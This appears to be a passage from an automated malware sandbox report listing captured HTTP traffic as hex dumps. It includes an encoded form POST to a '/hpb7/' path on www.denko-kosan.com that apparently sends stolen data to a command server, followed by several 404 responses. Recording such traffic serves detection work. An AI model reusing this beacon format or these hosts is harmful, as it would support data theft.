Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 77 6d 61 38 57 44 39 4c 6e 50 6d 74 39 6a 30 48 67 6f 69 67 48 30 6e 70 72 62 59 44 6b 55 70 6e 50 38 78 67 79 5a 6d 6e 7e 42 58 59 6a 70 45 77 4b 4a 28 55 51 6d 28 5a 5a 4a 70 53 75 74 58 33 52 77 73 57 35 61 4c 45 48 64 71 35 78 6e 59 46 53 4a 69 6c 54 39 72 36 4e 79 47 41 4e 66 33 32 79 54 75 72 36 32 34 30 68 43 34 61 50 37 76 6b 71 39 71 77 6a 67 54 42 70 45 50 6e 44 34 45 2d 52 73 4b 77 74 67 73 79 70 4b 63 39 6c 42 41 51 38 41 4b 62 50 63 6f 6b 54 69 4b 7a 65 65 37 76 50 72 67 49 6f 36 75 44 56 74 4a 58 76 71 73 47 48 6a 45 5a 72 57 76 58 38 74 74 79 31 7a 34 4a 31 6d 4d 31 57 59 42 50 5a 38 69 6f 45 62 35 45 58 4f 4f 6c 6e 38 7e 4b 6a 6c 4c 4f 78 37 39 30 53 69 35 30 70 78 4e 37 43 6a 33 43 49 6c 39 31 34 69 56 6b 4d 45 4d 69 62 4e 28 54 30 35 52 63 30 55 49 58 46 57 34 46 56 33 41 48 61 45 66 56 47 4a 66 53 37 32 73 6f 42 6f 68 50 72 53 56 33 48 73 56 34 7a 58 49 36 79 54 56 46 49 5f 49 4e 4b 6e 48 4c 31 33 75 4f 61 37 30 49 41 38 74 4e 4c 6f 77 36 4c 71 6b 49 31 35 6f 5f 73 32 55 4f 28 5a 41 74 46 34 52 45 54 44 42 76 28 31 52 30 75 6f 7e 4c 7e 4a 47 6f 7e 73 48 7a 76 42 44 71 75 6d 78 61 54 76 54 6d 30 4d 6c 33 57 54 4e 4f 71 79 42 5f 47 32 73 68 6a 66 4b 48 78 73 76 71 30 6b 51 75 45 6c 7a 78 43 37 43 6d 4e 55 46 73 6f 72 54 2d 58 51 4c 64 67 32 73 37 49 33 6a 50 62 79 54 5f 50 66 58 65 71 44 72 49 67 4e 37 37 78 33 28 61 6e 70 38 69 30 67 49 71 68 49 6f 39 49 49 39 4a 4a 68 63 35 28 56 28 62 33 6f 65 65 76 41 4e 65 66 70 32 62 67 62 6a 6f 34 31 67 6a 44 53 6f 71 30 59 50 
4b 31 6f 75 46 6e 57 4c 49 42 52 48 61 69 31 46 61 4b 66 4a 46 6f 63 6c 6e 67 6b 45 43 34 59 66 32 65 33 69 75 75 5f 47 2d 4f 55 57 62 55 55 71 56 30 61 63 34 6e 31 41 4d 43 64 35 6c 53 70 6f 33 41 49 76 65 76 33 39 73 4c 45 4f 71 28 5f 32 71 69 42 53 69 56 30 63 6a 36 34 4a 6f 79 43 64 57 67 71 76 5a 49 6e 76 52 73 36 4f 2d 76 77 47 57 7a 5a 72 6b 66 61 39 48 5a 64 35 79 75 6c 4f 6f 48 4e 43 50 79 72 77 56 78 43 4d 72 79 46 6a 41 63 4b 51 50 7e 47 54 36 48 56 62 76 65 7a 4a 30 6d 66 57 42 4a 4b 43 4d 56 4d 59 52 6a 62 37 77 34 72 51 68 68 5f 52 56 28 6a 34 34 58 41 76 72 6e 43 50 6d 59 53 59 61 66 31 30 52 77 70 52 6a 33 68 28 46 47 57 45 53 75 63 33 65 6c 51 54 38 79 61 35 6c 7a 77 48 48 6c 69 6e 42 66 54 6d 56 46 74 79 61 43 58 7e 35 37 4e 55 53 7e 47 4d 4c 34 77 43 74 4f 4d 42 6c 77 48 51 7a 71 38 7e 77 46 36 58 55 55 76 68 57 57 5f 62 65 32 62 7a 64 75 66 28 48 50 56 63 6b 72 36 67 6c 4c 46 76 68 79 6f 61 4b 51 73 34 4c 4b 53 37 31 58 33 68 48 56 33 61 79 39 59 35 38 67 73 53 30 78 64 72 6f 58 4b 4b 41 3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-IIS/8.5Date: Tue, 21 Mar 2023 07:07:25 GMTConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:07:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd c8 0d 01 
fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:07:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd c8 0d 01 
fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:13 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 
73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:16 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 
73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:19 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 
6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
